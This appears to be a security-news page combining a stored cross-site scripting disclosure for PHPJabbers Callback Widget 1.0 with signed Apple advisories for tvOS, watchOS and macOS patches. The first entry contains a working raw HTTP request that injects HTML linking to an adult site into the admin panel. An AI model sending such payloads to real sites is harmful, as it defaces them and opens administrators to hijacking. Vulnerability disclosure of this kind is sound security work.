PHPJ Callback Widget version 1.0 suffers from a persistent cross site scripting vulnerability.

    ## Title: PHPJ-Callback-Widget-1.0-XSS-Stored-admin-Hijacking## Author: nu11secur1ty## Date: 01/26/2024## Vendor: https://www.phpjabbers.com/## Software: https://www.phpjabbers.com/callback-widget/## Reference: https://portswigger.net/web-security/cross-site-scripting## Description:The Callback Requests function is vulnerable to javascript injection.The malicious user from everywhere can send an XSs-stored exploit codeto the admin panel, and then when the admin visits the API CallbackRequests function he will immediately activate the exploitation of themalicious actor. This is so fun, thanks for watching the PoC video. =)BRSTATUS: HIGH-Vulnerability[+]Exploit:```POSTPOST /1706261102_419/index.php?controller=pjFront&action=pjActionSave HTTP/1.1Host: demo.phpjabbers.comCookie: _ga=GA1.2.2069938240.1692907228;_fbp=fb.1.1705479327501.84379277;_ga_NME5VTTGTT=GS1.2.1705493664.10.1.1705493702.22.0.0;CallbackWidget=irnrkmih5bc4ehc7fcgbc8ql84Content-Length: 322Sec-Ch-Ua: "Not_A Brand";v="8", "Chromium";v="120"Accept: */*Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestSec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.216Safari/537.36Sec-Ch-Ua-Platform: "Windows"Origin: https://demo.phpjabbers.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://demo.phpjabbers.com/1706261102_419/preview.php?theme=theme1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Priority: u=1, iConnection: closereason_id=2&name=%3Ca+href%3D%22https%3A%2F%2Fwww.pornhub.com%22+target%3D%22_blank%22%3E+%09%3Cimg+src%3D%22https%3A%2F%2Fel.phncdn.com%2Fgif%2F45467111.gif%22+alt%3D%22STUPID%22width%3D%22900%22+height%3D%22450%22%3E+%3C%2Fa%3E&email=hack%40hack.com&phone=1234567890&besttime=30-01-2024+11%3A30&timezone=0&captcha=VIXFWL```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2024/Callback-Widget-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/01/phpj-callback-widget-10-xss-reflected.html)## Time spent:00:15:00

PHPJ Callback Widget 1.0 Cross Site Scripting

Apple Security Advisory 01-22-2024-9 - tvOS 17.3 addresses code execution vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-01-22-2024-9 tvOS 17.3

tvOS 17.3 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/kb/HT214055.

Apple maintains a Security Updates page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

Apple Neural Engine  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2024-23212: Ye Zhang of Baidu Security

CoreCrypto  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An attacker may be able to decrypt legacy RSA PKCS#1 v1.5  
ciphertexts without having the private key  
Description: A timing side-channel issue was addressed with improvements  
to constant-time computation in cryptographic functions.  
CVE-2024-23218: Clemens Lang

Kernel  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2024-23208: fmyy(@binary_fmyy) and lime From TIANGONG Team of  
Legendsec at QI-ANXIN Group

NSSpellChecker  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to access sensitive user data  
Description: A privacy issue was addressed with improved handling of  
files.  
CVE-2024-23223: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)

TCC  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to access user-sensitive data  
Description: An issue was addressed with improved handling of temporary  
files.  
CVE-2024-23215: Zhongquan Li (@Guluisacat)

Time Zone  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to view a user's phone number in system logs  
Description: This issue was addressed with improved redaction of  
sensitive information.  
CVE-2024-23210: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)

WebKit  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: A maliciously crafted webpage may be able to fingerprint the  
user  
Description: An access issue was addressed with improved access  
restrictions.  
WebKit Bugzilla: 262699  
CVE-2024-23206: an anonymous researcher

WebKit  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: Processing web content may lead to arbitrary code execution  
Description: The issue was addressed with improved memory handling.  
WebKit Bugzilla: 266619  
CVE-2024-23213: Wangtaiyu of Zhongfu info

WebKit  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: Processing maliciously crafted web content may lead to arbitrary  
code execution. Apple is aware of a report that this issue may have been  
exploited.  
Description: A type confusion issue was addressed with improved checks.  
WebKit Bugzilla: 267134  
CVE-2024-23222

Apple TV will periodically check for software updates. Alternatively,  
you may manually check for software updates by selecting "Settings ->  
System -> Software Update -> Update Software."  To check the current  
version of software, select "Settings -> General -> About."  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmWvDyQACgkQX+5d1TXa  
IvoUsA//bw9u1+Jxh79G7jV7SXt8HRV8yqr16Bhq00AqSdDx/RgVGTUs6cN8OfGX  
MVda91yeQS7WOEtrw7no8vD2HcGSvcTCRWTRQRSYJjZfZ4C3v9Rnt3Nlx/mvdLQg  
50Kn3Gm46C/+iFhuZhtSa9VrDhoaiLs3Wb9nVBrQ917CyNMXeDb1JuP1MOjPJgiJ  
IVZlcIwAFrx4f779ove/MtupyeeoHZwV1KICEDyVIZsUGMGf4ti6J8tdK73EmUPo  
a1Q6pRx8JRwtXBPkp/1PerRsfzb9bRAksZU6R5d8RdJBTpnx9kfZZpPWknyRX2R9  
gR6tJrswgHcalkHDL6UXJfnWS3XCrCHg2jKQbWPDvor6juOMUKfi40ww36H6KdRG  
ksNdFaWhmSK0Qu1EqS4bmCWYiUx16O/js7tbbNfXFp+ssjMtjunlVs9Ly3Jh2Fpi  
gry4IRE5Ll4oryFxUPV9KGM72eDL8PAwvIgDXx5/NkcrZIGZNl9eseJCsfZ/AV7Z  
dZTcc78Yguenm5Nsot6GmL1q0+LCj48PmcFu6VQF7KSFWcehAKjVIk+DaAOJITgF  
uJekaVJp3mVe5XRvtQrfMlegiog40gPxQgwJ/psUyp3Ss5uIOPF6EUrAj2xqERRc  
GVDDKWA3BFSCOJD/dtR/xmiwJdRMQwomeo8k1uUpd96ICM6VgJM=  
=HfBk  
-----END PGP SIGNATURE-----

Apple Security Advisory 01-22-2024-9

Apple Security Advisory 01-22-2024-8 - watchOS 10.3 addresses bypass and code execution vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-01-22-2024-8 watchOS 10.3

watchOS 10.3 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/kb/HT214060.

Apple maintains a Security Updates page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

Apple Neural Engine  
Available for devices with Apple Neural Engine: Apple Watch Series 9 and  
Apple Watch Ultra 2  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2024-23212: Ye Zhang of Baidu Security

CoreCrypto  
Available for: Apple Watch Series 4 and later  
Impact: An attacker may be able to decrypt legacy RSA PKCS#1 v1.5  
ciphertexts without having the private key  
Description: A timing side-channel issue was addressed with improvements  
to constant-time computation in cryptographic functions.  
CVE-2024-23218: Clemens Lang

Kernel  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2024-23208: fmyy(@binary_fmyy) and lime From TIANGONG Team of  
Legendsec at QI-ANXIN Group

Mail Search  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to access sensitive user data  
Description: This issue was addressed with improved redaction of  
sensitive information.  
CVE-2024-23207: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab), and  
Ian de Marcellus

NSSpellChecker  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to access sensitive user data  
Description: A privacy issue was addressed with improved handling of  
files.  
CVE-2024-23223: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)

Safari  
Available for: Apple Watch Series 4 and later  
Impact: A user's private browsing activity may be visible in Settings  
Description: A privacy issue was addressed with improved handling of  
user preferences.  
CVE-2024-23211: Mark Bowers

Shortcuts  
Available for: Apple Watch Series 4 and later  
Impact: A shortcut may be able to use sensitive data with certain  
actions without prompting the user  
Description: The issue was addressed with additional permissions checks.  
CVE-2024-23204: Jubaer Alnazi (@h33tjubaer)

Shortcuts  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to bypass certain Privacy preferences  
Description: A privacy issue was addressed with improved handling of  
temporary files.  
CVE-2024-23217: Kirin (@Pwnrin)

TCC  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to access user-sensitive data  
Description: An issue was addressed with improved handling of temporary  
files.  
CVE-2024-23215: Zhongquan Li (@Guluisacat)

Time Zone  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to view a user's phone number in system logs  
Description: This issue was addressed with improved redaction of  
sensitive information.  
CVE-2024-23210: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: A maliciously crafted webpage may be able to fingerprint the  
user  
Description: An access issue was addressed with improved access  
restrictions.  
WebKit Bugzilla: 262699  
CVE-2024-23206: an anonymous researcher

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: Processing web content may lead to arbitrary code execution  
Description: The issue was addressed with improved memory handling.  
WebKit Bugzilla: 266619  
CVE-2024-23213: Wangtaiyu of Zhongfu info

Instructions on how to update your Apple Watch software are available  
at https://support.apple.com/kb/HT204641  To check the version on  
your Apple Watch, open the Apple Watch app on your iPhone and select  
"My Watch > General > About".  Alternatively, on your watch, select  
"My Watch > General > About".  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmWvDqsACgkQX+5d1TXa  
IvqR0Q//a137PlcPioIws/A02XClBQtF95fwuaz7DEhi79XZvH1q1+N3EYd/1b8l  
YkGdXQik8uS4zpB4KBJ+8cRYqaNaMDO0lNr2RdGgUInMd2bc+HBHigxEY47Wzbr2  
UT3r2uJW70HalBNrGNOj15JQTQ4MhbjjTq/ezrIdCFTo1RHk9vOc//AajbDtWiQp  
X5jGhoGzDB378vswEEyp4OjArh5v2xEv5hcoIvrzlgkSz9aRwzLgluR7sXGifE6O  
vU7zP2oT36zwBAfTsY1CkarTeQprQ4iyiEIlDzwxr+Z2ooGUmOStzsQtuU28QSQK  
sl0b42V7mkTFWVCXymsjCBbGw/JPSkGzptOPNqoEtBddiMuLU2BGBWk51xa5cEzy  
tsLWd1vlnUms3CqM6QvOxdj3mzs4wzxha941a0h67lR7NeR09CqflKsr7vDFWOBY  
PdVAUSDRxeM1rntVJfFJAkssUV14TGSTDwqMQmiUyxqXfKymSc4dCqIDLyqcdblB  
wNtwKFlstCZxcmc2V0zfDWHJ0y75sTUUhlk3AvH/OeVve9rhDvtKdoKDHdOauKHw  
kss00oy5TLkeTYi26oJfEMtts7BS+8ZEF3cLNxOBZ/cdIO1+Ifl8jNcluTLlC8F7  
4MxcjC8prTl0aZ4sqJfcUBLnqkMdn0GaqXOPXSa6hQxiNc5dcIk=  
=hoM+  
-----END PGP SIGNATURE-----

Apple Security Advisory 01-22-2024-8

Apple Security Advisory 01-22-2024-7 - macOS Monterey 12.7.3 addresses code execution vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-01-22-2024-7 macOS Monterey 12.7.3

macOS Monterey 12.7.3 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/kb/HT214057.

Apple maintains a Security Updates page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

Accessibility  
Available for: macOS Monterey  
Impact: An app may be able to access sensitive user data  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2023-42937: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)

Apple Neural Engine  
Available for: macOS Monterey  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2024-23212: Ye Zhang of Baidu Security

curl  
Available for: macOS Monterey  
Impact: Multiple issues in curl  
Description: Multiple issues were addressed by updating to curl version  
8.4.0.  
CVE-2023-38545  
CVE-2023-38039  
CVE-2023-38546  
CVE-2023-42915

ImageIO  
Available for: macOS Monterey  
Impact: Processing a maliciously crafted image may result in disclosure  
of process memory  
Description: The issue was addressed with improved checks.  
CVE-2023-42888: Michael DePlante (@izobashi) of Trend Micro Zero Day  
Initiative

Mail Search  
Available for: macOS Monterey  
Impact: An app may be able to access sensitive user data  
Description: This issue was addressed with improved redaction of  
sensitive information.  
CVE-2024-23207: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab), and  
Ian de Marcellus

WebKit  
Available for: macOS Monterey  
Impact: Processing maliciously crafted web content may lead to arbitrary  
code execution. Apple is aware of a report that this issue may have been  
exploited.  
Description: A type confusion issue was addressed with improved checks.  
WebKit Bugzilla: 267134  
CVE-2024-23222

macOS Monterey 12.7.3 may be obtained from the Mac App Store or  
Apple's Software Downloads web site:  
https://support.apple.com/downloads/  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmWvDnUACgkQX+5d1TXa  
Ivqrqw//QZOnZpH5CnbfH10rxFF0CbZFRcHClM3RutihC4AuO5FedR3EDnUGyp53  
eJADLlNz3dTg15scv6P4AuT+hg8k3OFEPi1f2jVgRxlqsW8a15iIXYGti8y4UVwo  
kQgzfxYv33zuY0yWlIlERIP7imIT0jNgwFKn+Gs2ZaBq1xw52xq3I/jf97txAQHX  
Rpe35hnhYS7eGlB8spErKGBgyTuOf+piL7zccb+G/Hw6Y8AwSLsvXg3lSgZavEWE  
UIBoYGLycszT9U7tybuPUJ83jD0lIqFNhGNzHM6BnajYJ8SVdAXqVfid8Km9ixoi  
Sm73F6ZlCrUSLxihjXz92NQnBXJM2AxVI3Z1QqsqxOTS9yrkHYSgFgqUxxaP7ONt  
voHYw6fuycYca9TbFPmu6aStW1UBNwMLWYgjxbuTqqs+OEI8DKGcHIihGPQ184jW  
VF1bYNK8bvRMM+n/kaIHNo9/AyPnnSjmEOzr946ypg90FvTy3Wu1HhUm1MslzjNC  
LG5j6/hh0H7MXii8o5UL4ayabnPyZbWJrhRntvwx86xTLV9DPwmuwvxeVWm87Wu0  
EYC/XRAbtspHXMn5ItTNgqGbf0lKlrluXrAW79EFQdvPyD/Fzyljb+W9o2w1IA/9  
O8oXMVxqM4W+iRokcDbcbNQI3J2xGaP8FNwG6EEBB+bKkNWZ0m0=  
=zFhG  
-----END PGP SIGNATURE-----

Apple Security Advisory 01-22-2024-7

Apple Security Advisory 01-22-2024-6 - macOS Ventura 13.6.4 addresses bypass and code execution vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-01-22-2024-6 macOS Ventura 13.6.4

macOS Ventura 13.6.4 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/kb/HT214058.

Apple maintains a Security Updates page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

Apple Neural Engine  
Available for: macOS Ventura  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2024-23212: Ye Zhang of Baidu Security

Accessibility  
Available for: macOS Ventura  
Impact: An app may be able to access sensitive user data  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2023-42937: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)

Core Data  
Available for: macOS Ventura  
Impact: An app may be able to bypass Privacy preferences  
Description: This issue was addressed by removing the vulnerable code.  
CVE-2023-40528: Kirin (@Pwnrin) of NorthSea

curl  
Available for: macOS Ventura  
Impact: Multiple issues in curl  
Description: Multiple issues were addressed by updating to curl version  
8.4.0.  
CVE-2023-38545  
CVE-2023-38039  
CVE-2023-38546  
CVE-2023-42915

Finder  
Available for: macOS Ventura  
Impact: An app may be able to access sensitive user data  
Description: The issue was addressed with improved checks.  
CVE-2024-23224: Brian McNulty

ImageIO  
Available for: macOS Ventura  
Impact: Processing a maliciously crafted image may result in disclosure  
of process memory  
Description: The issue was addressed with improved checks.  
CVE-2023-42888: Michael DePlante (@izobashi) of Trend Micro Zero Day  
Initiative

LoginWindow  
Available for: macOS Ventura  
Impact: A local attacker may be able to view the previous logged in  
user’s desktop from the fast user switching screen  
Description: An authentication issue was addressed with improved state  
management.  
CVE-2023-42935

Mail Search  
Available for: macOS Ventura  
Impact: An app may be able to access sensitive user data  
Description: This issue was addressed with improved redaction of  
sensitive information.  
CVE-2024-23207: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab), and  
Ian de Marcellus

NSOpenPanel  
Available for: macOS Ventura  
Impact: An app may be able to read arbitrary files  
Description: An access issue was addressed with additional sandbox  
restrictions.  
CVE-2023-42887: Ron Masas of BreakPoint.sh

WebKit  
Available for: macOS Ventura  
Impact: Processing maliciously crafted web content may lead to arbitrary  
code execution. Apple is aware of a report that this issue may have been  
exploited.  
Description: A type confusion issue was addressed with improved checks.  
WebKit Bugzilla: 267134  
CVE-2024-23222

macOS Ventura 13.6.4 may be obtained from the Mac App Store or  
Apple's Software Downloads web site:  
https://support.apple.com/downloads/  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmWvDk0ACgkQX+5d1TXa  
IvrWTw/8DbDE/5ejAyR2F08VphoiOnJD5URY5WINPWVWps0w9svMI83Ig+MLlbVY  
APek5kQlSVJJoI7RXrSxgRCs3gcWVWVo08iVIM6woBbsd5JPaTYXe9/yUdRzWBX4  
zgOxvCh5wL4czXUV0ym4OMlDE5BZ3N+hEpyAIOJmNV7jkNnMshMWfeN6puFZgwt/  
FYt1BrU+MJ4PRA/A3B01ic3VQFnHifCE1jF/ebfb7DwZafK6EO2Hf91MNgAic5Td  
Q4TvwnHOqAq1N0cZa+SKNsStVx5Yk4J0ovNeecdQA2xNVfnd7jLaU1Y57SHjxNi9  
wbsENC3bTpZed+lMhDiBaRIj//Ej6KMeQKUNbcvPH5HCHP5YN68QFwkoA+QJdX66  
SH7jvDI6xgjlvVoNjqZ6bYHDr+CK5AB7fLDXhEGWBIssjce8AeaNPPA7JHMsVCen  
o7WXri4Bb7W4BwfpicTPlumkF+vva+nKYWvuAfob7v2yayeCa8vPKgrEPHXbCnWa  
8r1lqyQVqKL1wqS5RcpsHZEWrV2HF0hoKam4x3ZmLqNDhnVC0t8IipL0vqN+vzaU  
t26QZrpiW8V7CZRiXeCj5rDhv8Z1w+wEiuGLTqp9Z1JD/mCVy7Tmm2Y6RNYZw+jk  
lwpJpwqOpXbsCdx6kU28V8H1elS5cz3RdGCDex55lOlrMXp+KOs=  
=VoRh  
-----END PGP SIGNATURE-----

Tag

#apple